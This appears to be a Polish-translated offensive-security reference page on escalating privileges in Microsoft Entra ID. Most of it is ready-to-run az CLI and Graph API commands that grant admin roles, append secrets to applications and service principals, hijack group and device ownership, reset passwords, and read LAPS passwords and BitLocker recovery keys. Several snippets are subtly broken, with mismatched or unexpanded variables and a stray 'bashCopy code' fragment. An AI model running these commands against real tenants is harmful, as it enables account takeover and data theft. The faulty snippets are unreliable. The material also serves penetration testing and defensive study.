Az - EntraID Privesc

Role

Rola: Administrator Ról Uprzywilejowanych

Ta rola zawiera niezbędne szczegółowe uprawnienia, aby móc przypisywać role do podmiotów i nadawać więcej uprawnień rolom. Obie te akcje mogą być nadużywane do eskalacji uprawnień.

• Przypisz rolę użytkownikowi:

# List enabled built-in roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles"

# Give role (Global Administrator?) to a user
roleId="<roleId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

• Dodaj więcej uprawnień do roli:

# List only custom roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'

# Change the permissions of a custom role
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \
--headers "Content-Type=application/json" \
--body '{
"description": "Update basic properties of application registrations",
"rolePermissions": [
{
"allowedResourceActions": [
"microsoft.directory/applications/credentials/update"
]
}
]
}'

Aplikacje

microsoft.directory/applications/credentials/update

To pozwala atakującemu na dodanie poświadczeń (haseł lub certyfikatów) do istniejących aplikacji. Jeśli aplikacja ma uprzywilejowane uprawnienia, atakujący może uwierzytelnić się jako ta aplikacja i uzyskać te uprawnienia.

# Generate a new password without overwritting old ones
az ad app credential reset --id <appId> --append
# Generate a new certificate without overwritting old ones
az ad app credential reset --id <appId> --create-cert

microsoft.directory/applications.myOrganization/credentials/update

To pozwala na te same działania co applications/credentials/update, ale ograniczone do aplikacji w pojedynczej domenie.

az ad app credential reset --id <appId> --append

microsoft.directory/applications/owners/update

Opis: Aktualizuj właścicieli aplikacji Potencjał nadużycia: Dodając siebie jako właściciela, atakujący może manipulować aplikacją, w tym danymi uwierzytelniającymi i uprawnieniami.

az ad app owner add --id <AppId> --owner-object-id <UserId>
az ad app credential reset --id <appId> --append

# You can check the owners with
az ad app owner list --id <appId>

Service Principals

microsoft.directory/servicePrincipals/credentials/update

To pozwala atakującemu na dodanie poświadczeń do istniejących głównych usług. Jeśli główny usług ma podwyższone uprawnienia, atakujący może przyjąć te uprawnienia.

az ad sp credential reset --id <sp-id> --append

Jeśli otrzymasz błąd "code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid.", to dlatego, że nie można modyfikować właściwości passwordCredentials SP i najpierw musisz ją odblokować. Aby to zrobić, potrzebujesz uprawnienia (microsoft.directory/applications/allProperties/update), które pozwala na wykonanie:

az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<sp-object-id> --body '{"servicePrincipalLockConfiguration": null}'

microsoft.directory/servicePrincipals/synchronizationCredentials/manage

To pozwala atakującemu na dodanie poświadczeń do istniejących głównych zasad usług. Jeśli główna zasada usług ma podwyższone uprawnienia, atakujący może przyjąć te uprawnienia.

az ad sp credential reset --id <sp-id> --append

microsoft.directory/servicePrincipals/owners/update

Podobnie jak w przypadku aplikacji, to uprawnienie pozwala na dodanie kolejnych właścicieli do głównego obiektu usługi. Posiadanie głównego obiektu usługi umożliwia kontrolę nad jego poświadczeniami i uprawnieniami.

# Add new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

az ad sp credential reset --id <sp-id> --append

# You can check the owners with
az ad sp owner list --id <spId>

microsoft.directory/servicePrincipals/disable i enable

Te uprawnienia pozwalają na wyłączanie i włączanie zasad usług. Atakujący mógłby wykorzystać to uprawnienie, aby włączyć zasadę usług, do której mógłby uzyskać dostęp w jakiś sposób, aby eskalować uprawnienia.

Należy zauważyć, że w tej technice atakujący będzie potrzebował więcej uprawnień, aby przejąć włączoną zasadę usług.

bashCopy code# Disable
az ad sp update --id <ServicePrincipalId> --account-enabled false

# Enable
az ad sp update --id <ServicePrincipalId> --account-enabled true

microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials & microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials

Te uprawnienia pozwalają na tworzenie i uzyskiwanie poświadczeń do jednolitych logowań, co może umożliwić dostęp do aplikacji firm trzecich.

# Generate SSO creds for a user or a group
spID="<spId>"
user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"


# Get credentials of a specific credID
credID="<credID>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"

Grupy

microsoft.directory/groups/allProperties/update

To uprawnienie pozwala na dodawanie użytkowników do uprzywilejowanych grup, co prowadzi do eskalacji uprawnień.

az ad group member add --group <GroupName> --member-id <UserId>

Uwaga: To uprawnienie wyklucza grupy przypisane do ról Entra ID.

microsoft.directory/groups/owners/update

To uprawnienie pozwala na zostanie właścicielem grup. Właściciel grupy może kontrolować członkostwo i ustawienia grupy, potencjalnie eskalując uprawnienia do grupy.

az ad group owner add --group <GroupName> --owner-object-id <UserId>
az ad group member add --group <GroupName> --member-id <UserId>

Uwaga: To uprawnienie wyklucza grupy przypisane do ról Entra ID.

microsoft.directory/groups/members/update

To uprawnienie pozwala na dodanie członków do grupy. Atakujący mógłby dodać siebie lub złośliwe konta do uprzywilejowanych grup, co może przyznać podwyższone uprawnienia.

az ad group member add --group <GroupName> --member-id <UserId>

microsoft.directory/groups/dynamicMembershipRule/update

To uprawnienie pozwala na aktualizację reguły członkostwa w grupie dynamicznej. Atakujący mógłby zmodyfikować dynamiczne reguły, aby dodać siebie do uprzywilejowanych grup bez wyraźnego dodania.

groupId="<group-id>"
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
"membershipRuleProcessingState": "On"
}'

Uwaga: To uprawnienie wyklucza grupy przypisywalne do ról Entra ID.

Privesc grup dynamicznych

Możliwe, że użytkownicy mogą eskalować uprawnienia, modyfikując swoje własne właściwości, aby zostać dodanymi jako członkowie grup dynamicznych. Więcej informacji można znaleźć w:

Użytkownicy

microsoft.directory/users/password/update

To uprawnienie pozwala na resetowanie hasła dla użytkowników niebędących administratorami, co umożliwia potencjalnemu atakującemu eskalację uprawnień do innych użytkowników. To uprawnienie nie może być przypisane do niestandardowych ról.

az ad user update --id <user-id> --password "kweoifuh.234"

microsoft.directory/users/basic/update

To uprawnienie pozwala na modyfikację właściwości użytkownika. Często można spotkać dynamiczne grupy, które dodają użytkowników na podstawie wartości właściwości, dlatego to uprawnienie może pozwolić użytkownikowi na ustawienie wymaganej wartości właściwości, aby stać się członkiem konkretnej dynamicznej grupy i eskalować uprawnienia.

#e.g. change manager of a user
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
--uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'

#e.g. change department of a user
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"

Polityki dostępu warunkowego i obejście MFA

Źle skonfigurowane polityki dostępu warunkowego wymagające MFA mogą być obejście, sprawdź:

Urządzenia

microsoft.directory/devices/registeredOwners/update

To uprawnienie pozwala atakującym na przypisanie siebie jako właścicieli urządzeń, aby uzyskać kontrolę lub dostęp do ustawień i danych specyficznych dla urządzenia.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/devices/registeredUsers/update

To uprawnienie pozwala atakującym na powiązanie swojego konta z urządzeniami, aby uzyskać dostęp lub obejść polityki bezpieczeństwa.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/deviceLocalCredentials/password/read

To uprawnienie pozwala atakującym na odczytanie właściwości zapasowych poświadczeń lokalnego konta administratora dla urządzeń dołączonych do Microsoft Entra, w tym hasła

# List deviceLocalCredentials
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"

# Get credentials
deviceLC="<deviceLCID>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \

BitlockerKeys

microsoft.directory/bitlockerKeys/key/read

To uprawnienie pozwala na dostęp do kluczy BitLocker, co może umożliwić atakującemu odszyfrowanie dysków, naruszając poufność danych.

# List recovery keys
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"

# Get key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"

Inne interesujące uprawnienia (TODO)

• microsoft.directory/applications/permissions/update

• microsoft.directory/servicePrincipals/permissions/update

• microsoft.directory/applications.myOrganization/allProperties/update

• microsoft.directory/applications/allProperties/update

• microsoft.directory/servicePrincipals/appRoleAssignedTo/update

• microsoft.directory/applications/appRoles/update

• microsoft.directory/applications.myOrganization/permissions/update